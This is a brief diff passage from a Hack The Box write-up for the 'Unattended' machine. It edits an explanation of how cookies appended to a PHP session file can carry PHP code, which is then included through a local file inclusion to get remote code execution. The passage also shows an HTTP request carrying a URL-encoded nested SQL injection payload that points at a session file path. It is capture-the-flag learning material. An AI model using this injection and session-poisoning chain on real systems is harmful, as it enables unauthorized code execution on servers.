varjo/writeups/htb/unattended/Unattended.md

 Te: trailers
 Connection: close
 ```
-Since any cookies we add also get added to this session cookie, we can create our own new cookie containing php code, and then use the LFI to point to our session file to obtain remote code execution:
+Since any cookies we add are appended to the session file, we can create our own arbitrary cookie that contains php code.
+Then we use the LFI to point to our session file to obtain remote code execution:

 ```
 GET /index.php?id=25%27+UNION+SELECT+%22main%27+UNION+SELECT+%27/var/lib/php/sessions/sess_0eeec3brj9f8bs109u6ssli5p3%27%3b--+%22%3b--+ HTTP/1.1